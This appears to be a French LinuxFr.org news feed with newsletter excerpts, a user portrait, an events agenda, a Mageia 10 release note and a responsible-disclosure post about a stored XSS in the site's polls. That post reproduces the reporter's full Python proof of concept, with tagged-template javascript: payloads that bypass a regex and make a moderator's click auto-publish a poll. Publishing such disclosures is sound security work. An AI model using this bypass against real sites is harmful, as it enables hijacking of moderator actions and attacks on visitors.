      Les derniers appels sont lancés une fois que tout le monde semble satisfait de l'état actuel d'une XEP. Une fois que le Conseil a décidé que la XEP semble prête, l'Éditeur XMPP émet un dernier appel pour recueillir des commentaires. Les commentaires recueillis lors du dernier appel peuvent aider à améliorer la XEP avant de le renvoyer au Conseil pour qu'il passe à l'état Stable.

      • Pas de dernier appel de XEP ce mois-ci.
      Extensions stables
      • Pas de XEP passant à stable ce mois.
      Extensions dépréciées
      • Pas de XEP dépréciée ce mois.
      Extensions rejetées
      • Pas de XEP rejetée ce mois.
      Partagez les nouvelles

      Veuillez partager cette nouvelle sur d'autres réseaux :

      Consultez également notre flux RSS !

      Vous recherchez des offres d'emploi ou souhaitez engager un consultant professionnel pour votre projet XMPP ? Consultez notre tableau d'affichage des offres d'emploi XMPP.

      Contributions et traductions de la lettre d'information

      Il s'agit d'un effort communautaire, et nous tenons à remercier les traductrices et traducteurs pour leur contribution.
      Les bénévoles et les nouvelles langues sont les bienvenues !
      Les traductions de la lettre d'information XMPP seront publiées ici (avec un certain retard) :

      Contributions à la lettre d'information de ce mois-ci : emus, cal0pteryx, Gonzalo Raúl Nemmi, Ludovic Bocquet, XSF iTeam

      Contributions à la traduction :

      Aidez-nous à créer la lettre d'information

      Cette lettre d'information XMPP est produite en collaboration avec la communauté XMPP. Chaque numéro mensuel est rédigé dans ce simple pad. À la fin de chaque mois, le contenu du pad est fusionné dans le dépôt GitHub de la XSF. Nous sommes toujours ravis d'accueillir de nouvelles personnes contributrices. N'hésitez pas à rejoindre la discussion dans notre groupe de discussion Comm-Team (MUC) et à nous aider ainsi à poursuivre cet effort communautaire. Vous avez un projet et souhaitez le faire connaître ? N'hésitez pas à partager vos actualités ou événements ici, et à les promouvoir auprès d'un large public.

      Tâches que nous effectuons régulièrement :

      • collecte d'actualités dans l'univers XMPP
      • résumés courts d'actualités et d'événements
      • résumé de la communication mensuelle sur les extensions (XEP)
      • révision du projet de lettre d'information
      • préparation d'images pour les médias
      • traductions
      • communication via les comptes des médias
      Licence

      Cette lettre d'information est publiée sous licence CC BY-SA.

      Télécharger ce contenu au format EPUB

      Commentaires : voir le flux Atom ouvrir dans le navigateur

      Portrait d’un membre de la communauté Scenari : Yves Vandermeer (ECTEG)

      8 juillet, 2026 - 20:32

      Scenari est un ensemble de logiciels open source dédiés à la production collaborative, publication et diffusion de documents multi-support (Opale pour la formation, Dokiel pour la documentation, Optim pour les présentations génériques, Topaze pour les études de cas, Parcours pour créer des scénarios de formation, etc.)

      Aujourd’hui nous échangeons avec Yves vandermeer, basé en Belgique, coordinateur de l’European Cybercrime Training and Éducation Group (ECTEG).

      ECTEG est une association internationale sans but lucratif (AISBL), qui regroupe des services de police des États membres de l’Union européenne et de l’Espace économique européen ainsi que des organismes internationaux, des universités, des entreprises du secteur privé et des experts.

      Financés par des fonds de la Commission européenne, l’ECTEG développe des formations en cyber-criminalité et analyse technico-légale des traces informatiques mises à la disposition des entités de police et des magistrats des États Membres et au-delà, par nos partenariats avec Europol, Interpol, l’OSCE, UNODC et le Conseil de l’Europe.

      Comment as-tu connu Scenari ?

      Début 2017, à la création d’ECTEG, j’étais à la recherche d’un outil de développement de contenus de formation interactifs et collaboratifs. Par de la veille et des recherches sur internet, j’ai découvert Scenari et sa communauté. Rapidement, une première formation interactive a été développée et mise à la disposition des forces de police européennes.

      Actuellement vous utilisez quels modèles Scenari et pourquoi ?

      Nous avons à présent migré la presque totalité de nos formations en ligne et en présentiel sur Scenari, pour lesquelles nous utilisons Topaze pour créer des jeux sérieux et Dokiel en version anglaise. Notre expérience en Topaze a été présentée lors des Rencontres Scenari 2020.

      L’utilisation de Dokiel permet de développer des cours en ligne qui préparent aux cours en présentiel. Lors de ces cours des labos pratiques sont communiqués aux participants, souvent en PDF et les solutions ensuite revues en mode “diapositives”.

      Une utilisation spécifique de Dokiel a également permis de rédiger les scripts et la documentation de deux scenarios réalistes pour lesquels les traces ont été enregistrées en temps réel, permettant ainsi de développer des exercices qui ressemblent à des enquêtes réelles. L’utilisation des variables, par exemple, a permis de rédiger le script en ignorant le numéro de la plaque minéralogique de la voiture des suspects. Mise à jour au moment du tournage, cette variable a permis de créer une documentation précise et complète du matériel ainsi créé.

      Avec plus de quatre-vingts experts travaillant à distance depuis différents pays européens, les fonctionnalités collaboratives de Scenari se sont révélées uniques, et les évolutions du cœur et des différents modèles apportent toujours de nouvelles réponses aux besoins pédagogiques.

      Y a-t-il des fonctionnalités transverses de Scenari que vous utilisez à l’ECTEG ?

      Nous utilisons les ateliers dérivés pour permettre les traductions de contenu, désormais assistées par une IA interne, mais aussi pour les localiser afin de s’adapter aux législations et pratiques qui différent pays à l’autre et pour certains cours sur d’autres continents. À titre d’exemples, un cours sur l’analyse des virus informatiques a récemment été traduit en espagnol pour former les spécialistes en Amérique du Sud et une version modifiée d’une autre formation adaptée pour la formation des autorité judiciaires, procureurs et juges.

      Quelle est votre implication dans la communauté ?

      Après une petite dizaine d’années d’utilisation de Scenari, il est devenu l’un de nos outils principaux et nous travaillons, avec l’aide de l’Association Scenari et de Kelis, au développement de nouvelles fonctionnalités pour répondre aux besoins exprimés par les utilisateurs et faciliter le déploiement des formations dans l’Union européenne et dans des pays tiers, bien sûr en Ukraine mais également en Asie et en Amérique du Sud.

      Quels projets avec Scenari prévoyez-vous dans le futur ?

      Ajouter la réalité virtuelle et améliorer l’intégration des cours développés sur des plateformes de formation comme Moodle sont quelques-uns de nos projets pour les mois à venir. Il est aussi important que ces développements soient mis à la disposition de la communauté Scenari.

      À combien estimes-tu le nombre de personnes ayant consulté vos productions faites avec Scenari ?

      Une de nos formations, entièrement en ligne et interactive qui comporte à ce jour six jeux sérieux est développée par une trentaine de policiers experts, cinq procureurs et une juge d’instruction. L’équipe interne d’ECTEG apporte son soutien pour les fonctionnalités avancées et la cohérence pédagogique. Ce cours a permis de former environ 1500 premiers intervenants mais s’implémente petit à petit dans les différents pays. Pour d’autres cours, techniquement plus avancés, environ 500 praticiens en analyse technico-légale les ont déjà suivis. Ce n’est qu’un début, pour la formation destinée aux premiers intervenants le public visé en Europe est de plus d’un demi-million de policiers, dès qu’elle sera disponible dans chacune des langues officielles.

      Merci Yves !

      Télécharger ce contenu au format EPUB

      Commentaires : voir le flux Atom ouvrir dans le navigateur

      Open Source Experience 2026 : appel à stands et retour sur l’édition 2025 #OSXP2026

      7 juillet, 2026 - 15:22

      Après le palais des congrès et la Cité des Sciences et de l’Industrie, Open Source Experience déménage cette année à la porte de Versailles (toujours à Paris donc) et se tiendra les 9 et 10 décembre 2026. Cela nous permettra de nouveau d’avoir quelques stands de plus pour le village associatif !

      D’ailleurs, l’appel à stands est ouvert et n’attend plus que votre candidature.

      En attendant, vous trouverez un petit retour sur cette cinquième édition qui s’est tenue les 10 et 11 décembre derniers, à la Cité des Sciences et de l’Industrie. L’événement était de nouveau couplé à DevOpsREX et ce duo d’événements colocalisés semble bien fonctionner. Encore une fois, nous étions là pour vous rencontrer, interagir avec la communauté et vous faire plaisir !

      Revue de presse de l’April pour la semaine 27 de l’année 2026

      6 juillet, 2026 - 21:30

      Agenda du Libre pour la semaine 28 de l'année 2026

      5 juillet, 2026 - 11:50

      Calendrier Web, regroupant des événements liés au Libre (logiciel, salon, atelier, install party, conférence), annoncés par leurs organisateurs. Voici un récapitulatif de la semaine à venir. Le détail de chacun de ces 30 événements (France: 25, Belgique: 2, Internet: 2, Québec: 1) est en seconde partie de dépêche.

      Sommaire [FR Saint Clar] Tous les Lundis, médiatheque de Saint Clar – Le lundi 6 juillet 2026 de 10h00 à 17h00.

      Tous les lundis de 10h à 17h sans interruption, l’association Prends-toi en main / atelier abcpc, propose install party, suivi, dépannage, formation et revalorisation à petit prix sous Linux exclusivement.

      L’atelier abcpc existe depuis plus de 10 ans et milite exclusivement pour les logiciels libres.

      [FR Saint-Étienne] Permanence de l’association Alolise – Le lundi 6 juillet 2026 de 19h00 à 22h00.

      Tous les lundis soir de 19h à 22h (hors jours fériés) à la Bricoleuse.

      Rencontrer les bénévoles, poser des questions sur le libre ou l’informatique, les logiciels, l’hébergement, passer de Windows à Linux.

      Pour passer votre ordinateur sous Linux, nous vous invitons à nous prévenir avant votre passage: contact@alolise.org.

      [FR Sainte-Hélène] Cours gratuits d’Espéranto + Visio – Le lundi 6 juillet 2026 de 19h30 à 21h30.

      Saluton,

      Je vous propose des cours d’espéranto gratuits qui débuteront le lundi 8 juin à Sainte-Hélène dans le Médoc et qui sera également disponible en visioconférence.
      Le cours est destiné aux apprenants francophones de France et d’ailleurs.

      L’espéranto est plus qu’une langue neutre et très facile, mais aussi une langue fraternelle et libre qui permet de voyager dans de nombreux pays avec des facilités d’hébergement ou de fraterniser avec des personnes du monde entier.
      Vous trouverez plus d’informations sur la page Wikipédia, le site Espéranto-Gironde ou en visualisant le documentaire "ESPÉRANTO: de la genèse à la conquête de l’Europe"

      Les cours ont lieu le lundi soir de 19h30 à 21h30 sur environ 10 soirs pour réaliser les 10 leçons. Ces leçons complèteront les cours papier ou d’application telle que Duolingo.
      Début: lundi 8 juin 2026.
      Les cours sont GRATUITS pour tous.

      Le cours est en présentiel à Sainte-Hélène (33480) au foyer des sociétés en collaboration avec l’association l’Écurieux, ainsi qu’en distanciel / visioconférence.
      Ce cours est gratuit pour tous, en présentiel ou en distanciel.

      Nous pourrons organiser à la suite du cours, des rencontres avec les espérantistes de Bordeaux, du pays basque… afin de pratiquer en situation réelle.

      N’hésitez pas à nous contacter par téléphone au 0688350981 (appel, SMS, Signal) pour plus d’informations ou pour vous inscrire.

      Vivu Esperanto kaj Ĝis la revido.

      [FR Saint-Herblain] Repair Café numérique + Install Party – Le mardi 7 juillet 2026 de 14h00 à 17h00.

      Un ordinateur qui rame, qui refuse de démarrer ou qui est cassé, venez le réparer en notre compagnie.

      Marre de Windows et envie d’un peu de liberté, venez le libérer!

      [FR Dijon] Atelier du mardi – Le mardi 7 juillet 2026 de 15h00 à 19h00.

      Présentation de différents outils concernant les logiciels libres.

      Assistance technique.

      De préférence sur RDV directement sur le site de l’asso

      [CA-QC Montréal] Rencontres Linux au Québec – Le mardi 7 juillet 2026 de 17h00 à 21h30.

      Local de la rencontre: École de Technologie Supérieure local B-0904
      Rencontre virtuelle: Suivez le lien sur la page de l’événement

      17:00 à 19:00 – 5 à 7 virtuel et en présentiel

      Rejoignez-nous pour un moment de détente et de convivialité lors de notre 5 à 7. Que vous préfériez nous retrouver au Resto-Pub 100 Génies de l’ÉTS ou en ligne sur BigBlueButton (BBB), l’essentiel est de partager un moment agréable. Si vous avez l’intention de venir en personne, veuillez nous en informer afin de pouvoir réserver suffisamment de place pour vous.

      18:30 à 19:00 – Installation et tests de l’environnement hybride (tests de son et vidéo)

      Nous assurerons que l’environnement hybride soit parfaitement opérationnel en effectuant des tests de son et de vidéo.

      19:00 à 21:30 – Programmation de la rencontre

      1. Accueil et mot de bienvenue Martial Bigras
      2. Capsule éducative: L’objection-sociocratique comme core de gouvernance léger pour les petites communautés open source. Par Jérémy Viau-Trudel

      Jérémy viendra vulgariser et partager le résultat de 27 ans en recherche-action sur les communautés de pratiques ouvertes, de développement libre et open source.

      Pas de blabla inutile: un format court, dense et accessible pour comprendre les clés d’une gouvernance collaborative efficace.

      Une courte présentation inspirante à ne pas manquer pour tous les passionnés de l’écosystème libre.

      XSS sur le site linuxfr.org (pas très grave à mon avis)

      2 juillet, 2026 - 23:05

      Ce titre est celui d’un courriel reçu le samedi 20 juin 2026 en fin de soirée. La France est alors au milieu de sa deuxième canicule de l’année, et moi en train de produire la dépêche De la fermeture des comptes inactifs depuis 3 ans que je pensais initialement en avance et qui était finalement en retard.

      Et donc recevoir un tel message n’annonçait rien de bien rafraîchissant. (Même si ça changeait des week-ends successifs d’annonces de failles de sécurité noyau à déployer plus ou moins en urgence)

      Pourtant il s’agissait du signalement d’une faille réelle, fait de façon détaillée, claire et pédagogique. Ça change du bruit de fond habituel sur Internet avec son lot de tentatives diverses et variées d’injections chimériques mi-SQL mi-Javascript mi-PHP, et ses fameux audits de sécurité non-sollicités et délicieusement bourrins. Grand merci donc à 0xMitsurugi H pour avoir explicité le problème.

      Sommaire Le signalement L’explication

      (avec l’autorisation de l’auteur «  mon code et le rapport sont open source »)

      Bonjour, J’ai lu le code source de linuxfr.org et je me suis intéressé aux sondages. J’ai l’impression que certains échappements HTML ne fonctionnent pas très bien. Il est possible de bypasser la regexp dans les réponses du sondage et injecter du javascript dans les réponses. En soi, ce ne serait pas grave, car un sondage doit être validé par un admin pour que les utilisateurs le voient. L’astuce ici consiste à utiliser une réponse avec du js qui fera valider automatiquement le sondage par un admin, et mettre un second javascript dans une autre réponse destiné aux utilisateurs, une fois le sondage validé, permettant la compromission de tous les utilisateurs qui vont cliquer sur le sondage. Voici le poc en python (inliné dans le mail car google fait des dingueries avec les pièces jointes en python): #!/usr/bin/env python3 r""" PoC — XSS stockee via linkify dans les reponses de sondage linuxfr.org Vecteur : href="javascript:..." active au clic Bypass regex : tagged template ` func`arg` ` au lieu de func('arg') - document.querySelector`.ok_button` au lieu de document.querySelector('.ok_button') - form.submit`` au lieu de form.submit() - alert`msg` au lieu de alert('msg') Aucune parenthese `)` n'apparait dans l'URL markdown, donc la regex \[([^\]]*)\]\(([^)]*)\) ne peut rien manger. Contrainte : 128 caracteres max (PollAnswer) Phase 1 : 64 car. (form.submit pour auto-publication) Phase 2 : 54 car. (alert de preuve) Deroulement : 1. Attaquant cree un sondage avec les payloads XSS 2. Moderateuur visite /moderation/sondages/ID et clique sur [a] 3. La publication se fait sans boite de confirmation 4. Les visiteurs cliquent sur [b] -> alerte JavaScript Usage : python3 poc.py <url> <user_session> <url> : racine du site (ex: http://dlfp.lo) <user_session> : valeur du cookie linuxfr.org_session (compte standard) Exemple : python3 poc.py http://dlfp.lo "user_session_value" Prerequis : pip install requests """ import re import sys from urllib.parse import urljoin, urlparse import requests def e(msg: str, code: int = 1) -> None: print(f"[-] {msg}") sys.exit(code) def s(msg: str) -> None: print(f"[+] {msg}") def info(msg: str) -> None: print(f"[*] {msg}") def banner() -> None: print("=" * 68) print(" PoC — XSS linkify -> Auto-validation + XSS proof") print(" Vecteur : tagged templates dans href (pas de ) necessaire)") print(" Cible : linuxfr.org") print("=" * 68) def make_session(cookie_value: str, target_url: str) -> requests.Session: s = requests.Session() hostname = urlparse(target_url).hostname s.cookies.set("linuxfr.org_session", cookie_value, domain=hostname) return s def create_poll(url: str, session: requests.Session,) -> tuple[str, str]: """ Cree un sondage avec les reponses malveillantes. """ # Réponse 1 : 64 car. — form.submit() via tagged template # document.querySelector`.ok_button` => querySelector('.ok_button') # form.submit`` => form.submit() payload_phase1 = ( "[a]" "(javascript:document.querySelector" "`.ok_button`.form.submit``)" ) # Réponse 2 : 54 car. — alert via tagged template payload_phase2 = ( "[b]" "(javascript:alert" "`smile this is your favorite XSS`)" ) info("Chargement du formulaire de creation...") r = session.get(urljoin(url, "/sondages/nouveau")) csrf = re.search( r'name="authenticity_token" value="([^"]*)"', r.text ) csrf = csrf.group(1) info("Creation du sondage malveillant...") r = session.post(urljoin(url, "/sondages"), data={ "authenticity_token": csrf, "poll[title]": "PoC XSS — tagged template", "poll[wiki_explanations]": ( "Cliquez sur les liens ci-dessous !" ), "poll[cc_licensed]": "1", "poll[answers_attributes][0][answer]": payload_phase1, "poll[answers_attributes][1][answer]": payload_phase2, }) if r.status_code not in (200, 302): e(f"Creation echouee (HTTP {r.status_code})") print("Connectez vous en tant qu'admin et cliquez sur la réponse A") def main(): banner() if len(sys.argv) != 3: print(f"Usage: {sys.argv[0]} <url> <user_session>") print() print("Exemple :") print(f' {sys.argv[0]} http://dlfp.lo "SESSION_USER"') sys.exit(1) target_url = sys.argv[1].rstrip("/") user_session_val = sys.argv[2] user_session = make_session(user_session_val, target_url) # Creation du sondage malveillant print() info("Creation du sondage avec payloads XSS") create_poll(target_url, user_session) if __name__ == "__main__": main() Et je joins les copies d’écran dans l’ordre :-) C’était sympa à trigger, je ne pensais pas arriver à quelque chose avec l’autovalidation de l’admin pour publier le sondage. Bon, il faut quand même l’interaction d’un admin (d’où le fait que ce n’est pas très grave), j’ai essayé des trucs à base de onmouseover, mais je n’arrive à rien de bien ce soir, il fait trop chaud. Merci de gérer et maintenir le site linuxfr, j’ai appris beaucoup de choses en le lisant, même si je ne suis qu’un simple lecteur :-) Merci de fournir le code source sur github, ça m’a permis de debug en live mes tests. Bonne soirée Et paf le PoC !

      Les cinq images étaient en pièces jointes du signalement.

      La démonstration à l’œuvre :

      En admin, le nouveau sondage dans la page des sondages :

      En admin, cliquer sur un choix autovalide le sondage :

      Et sur le sondage publié, un clic d’un compte utilisateur :

      Paf la faille :

      Un peu de contexte

      La faille signalée concerne le type de contenu sondages du site LinuxFr.org : un sondage est une question sur un thème donné ; le lectorat du site LinuxFr.org peut choisir parmi un ensemble de réponses proposées. (aide)

      Une personne ayant un compte sur le site peut proposer un sondage (aide). Sa publication nécessite une approbation par l’équipe de modération (aide).

      Un sondage est composé d’une partie question en Markdown. Et de (en général) plusieurs réponses dans un format exotique : c’est du texte brut, pas de mises en forme en italique/gras ou autre, sauf que les liens au format Markdown [oh un lien](https://une.adresse.invalid) sont possibles, depuis 2012. Ce code pour gérer du supposé texte brut mais acceptant des hyperliens Markdown, avec une expression rationnelle pour gérer, forcément ça annonçait un hypothétique problème à venir.

      « Le cross-site scripting (abrégé XSS) est un type de faille de sécurité des sites web permettant d'injecter du contenu dans une page, provoquant ainsi des actions sur les navigateurs web visitant la page. » (Wikipedia) : ici on va glisser un sondage malveillant dans la base de données LinuxFr.org, une personne modératrice va aller le lire et déclencher involontairement la publication, qui devient alors visible par tout le monde, et chaque personne qui ira voter sur le sondage va déclencher un comportement non désiré. Bon en pratique, à ce moment là, ladite personne modératrice se rendrait alors compte du problème et dépublierait le sondage en catastrophe. Potentiellement trop tard pour quelques personnes du lectorat avides de sondages.

      Une vraie faille

      Bon si ça se trouve, la faille ne fonctionne pas, c’est facile de tester et de voir si on reproduit. Bon on reproduit…

      En analysant le code et en testant, on voit qu’il y a plusieurs soucis :

      • on peut insérer en base de données des choses que l’on ne voudrait pas y voir ;
      • on peut afficher ce qu’on a trouvé en base en filtrant mal.

      Donc on va ajouter un filtrage à la création sur les hyperliens pour ne laisser passer que les protocoles autorisés et que des adresses qui ressemblent à des adresses.

      Et on va ajouter un filtrage à l’affichage / conversion en HTML pour n’afficher que des hyperliens, dans les protocoles autorisés et avec une adresse qui ressemble à une adresse.

      Évidemment il y a la contrainte de ne pas casser le fonctionnel et les sondages déjà présents en base de données.

      Donc on fait plein de tests un peu cracra :

      Et on produit un commit de correction (si tout va bien).

      On a aussi vérifié le contenu existant de la base, au cas où.

      Il ne restait plus qu’à remercier le contributeur et à convenir d’une publication en dépêche. Que voici.

      Conclusion

      Une contribution par une personne qui a lu le code source, qui a déployé le site, qui a écrit un bout de code pour illustrer l’exploitation de la faille de bout-en-bout, qui a littéralement illustré l’exploitation avec cinq images et qui a accompagné le tout d’une explication détaillée et en fournissant le code. Que demander de plus ? Encore merci.

      Ah oui il faut une ouverture finale et tenir en haleine le lectorat : cette dépêche n'évoque pas la dernière faille signalée (ni même l'avant-dernière), et on n'est que douze jours après.

      Télécharger ce contenu au format EPUB

      Commentaires : voir le flux Atom ouvrir dans le navigateur

      Mageia 10 : le manchot sort du chaudron !

      1 juillet, 2026 - 18:13

      La nouvelle mouture de la distribution Linux communautaire Mageia est disponible : la version 10 fait sortir le manchot du chaudron ! Les personnes connaissant la distribution comprendront l’allusion ;-)   Cauldron — le chaudron — étant la version de développement, il est naturel d’en obtenir une version installable stabilisée périodiquement.

      À vos téléchargements pour utiliser cette nouvelle mouture.

      Cette version 10 de Mageia marque les 16 ans du lancement de la distribution (septembre 2010), elle s’inscrit dans la continuité de Mageia 9 qui nous a accompagnés et a évolué depuis plus de 2 ans et ½   ;-)

      Versions disponibles

      Mageia 10 est classiquement proposée à l’installation avec différents choix :

      • image ISO Live avec Plasma/KDE, GNOME seulement en x86_64, XFCE en x86_64 et i686 ;
      • image de DVD/clé USB d’installation (plus) complète en x86_64 et i686 avec choix du bureau ou serveur ;
      • image d’installation réseau en x86_64 et i686, permettant une installation minimaliste ou plus complète avec les méta-paquets task- (plasma, gnome, lxqt, lamp-php, edu, astronomy…).
      Nouveautés

      Mises à jour des environnements de bureau

      • Plasma KDE 6.5.5
      • GNOME 49
      • XFCE 4.20
      • ainsi que Cinnamon, Enlightenment, LXDE, LxQt, MATE et quelques window managers FVWM (2 & 3), swm, twm, WindowMaker, xfwm… ainsi que quelques compositeurs Wayland comme hyprland, sway…

      Au niveau des logiciels, GIMP 3.2.4 (GIMP 2.10 n’est plus disponible, mais à qui va-t-il manquer ?), FreeCAD 1.1.1, Inkscape 1.4.4, Mathmod 13.0…

      Points marquants

      Mageia 10 est sans doute la dernière version à proposer Plasma 6.5.5 et GNOME 49 pour X11. En effet, la version suivante GNOME 50 sortie récemment commence les travaux de suppression de la prise en charge de X.org : c’est Wayland qui est désormais standard. Ceci explique certainement le fait que Mageia fait le choix de ne pas passer vers Gnome 50.

      Concernant l’architecture 32 bits, ses jours^W mois sont sans doute comptés aussi : c’est i686 qui est encore proposé à l’installation (et non plus i586). Dommage pour les EeePC avec les processeurs Intel Atom N270 (déjà que la résolution d’écran de 1024x600 n’aidait pas trop :/). Pour les jeux, Wine 11.0 est fourni avec Wine-Wow64, permettant de bénéficier de meilleures performances et de faire fonctionner des applications et jeux 32 bits sans paquets dédiés 32 bits, ce qui évite d’avoir à activer les dépôts 32 bits sur une distribution x86_64.

      Lors du cycle de publication de Mageia 10, des failles critiques du noyau Linux ont été prises en compte : CopyFail (CVE-2026-31431) par fourniture du noyau 6.18.22 et suivants incluant les correctifs, puis DirtyFrag (CVE-2026-46300, mise à jour noyau), puis Fragnesia (CVE-2026-46300), puis vulnérabilité dans ptrace (CVE-2026-46333, mise à jour noyau 6.18.30 avec patch pour get_dumpable dans ptrace, le noyau 6.18.31 incluant déjà le patch). Les mises à jour correspondantes pour le noyau 6.6.x LTS de Mageia 9 ont aussi été proposées, elles sont tracées dans les advisories Mageia MGASA- lorsque suivies par l’équipe sécurité et dans le changelog du noyau (urpmq - i --changelog kernel-desktop-latest) lorsqu’un patch est spécifiquement appliqué (sinon voir le changelog de la version officielle du noyau).

      Montées de versions successives de Firefox 140.6 à 140.11 LTS : consommation mémoire améliorée ?

      Le paquet chromium-browser-stable 136 a été le dernier fourni en Mageia 9 et a dû être abandonné par manque de mainteneur pour Mageia 10 : l’installation peut être effectuée via flatpak ou passer au paquet RPM de Chrome disponible chez Google. Si un nouveau mainteneur se manifeste, il pourrait redevenir disponible pour Mageia 10 via les updates, avis aux personnes motivées à devenir empaqueteur _o/ (même si ce n’est clairement pas le paquet le plus simple pour commencer).

      En contrepartie, des navigateurs pour le protocole Gemini ont été ajoutés : Lagrange (SDL), Kristall (Qt), Offpunk (CLI).

      Jeux et autres logiciels (liste non exhaustive)

      0ad 0.28 a été actualisé à la version « Bolorix ».

      Flightgear en version 2024.1.5 un simulateur de vol ayant ses fans sur MLO (plus de 586 pages dans le fil du forum jeux).

      Rocks 'n Diamonds est en version 4.4.1.2 (et a plus de 30 ans !)

      Audacity en version 3.7.7 — la 3.7.8 étant sortie après la rc1, à voir si elle fera son chemin dans les updates — pour profiter des greffons Tempo tracks, LADSPA, et analyseur Vamp tant qu’ils sont encore disponibles.

      FreeCAD 1.1.1 pour la modélisation 3D en fablab intégré lors du cycle de bêta de Mageia 10 (Mars 2026) sera la dernière suivant cette numérotation, le choix du passage à CalVer étant entériné

      Inkscape 1.4.4 pour avoir une version de maintenance de la branche 1.4.x à jour apportant moins de plantages et plus de performances.

      LibreOffice 26.2.3.2 la suite de bureau, à voir si la prochaine version à venir 26.8 sera ajoutée dans les updates pour la rentrée des classes ;-)

      Les paquets pour le serveur et le client Nextcloud en version 32 font leur retour avec Mageia 10.

      Communauté et contributions

      Présent avec un stand à Capitole du libre en novembre 2025, au PSL XXL et visite à l’OSXP en décembre 2025, JDLL fin mai 2026.

      Nos amis de MageiaLinux-Online (MLO) sont toujours de la partie _o/ Tutoriels et forums en français vous accueillent. Rendez-vous à la rentrée pour install'parties et événements du Libre ;-)

      Télécharger ce contenu au format EPUB

      Commentaires : voir le flux Atom ouvrir dans le navigateur

      Podcast Projets Libres saison 4 épisode 19 : surveiller les grandes plateformes grâce à Open Terms Archive

      1 juillet, 2026 - 14:26

      Comment rendre plus transparents les changements des conditions d'utilisation des grands services numériques ?
      Pour ce nouvel épisode sur les communs numériques, nous partons à la découverte d'Open Terms Archive !

      Open Terms Archive permet de suivre et alerter des changements qui se cachent dans ces documents peu compréhensibles.

      Avec Sydney Wheeler et Matti Schneider nous revenons sur :

      • la genèse du projet
      • sa gouvernance et sa communauté
      • son fonctionnement
      • ses défis de structuration après sa phase d'incubation au sein du ministère des affaires étrangères jusqu'à janvier 2026
      • son utilisation en dehors de la France
      Télécharger ce contenu au format EPUB

      Commentaires : voir le flux Atom ouvrir dans le navigateur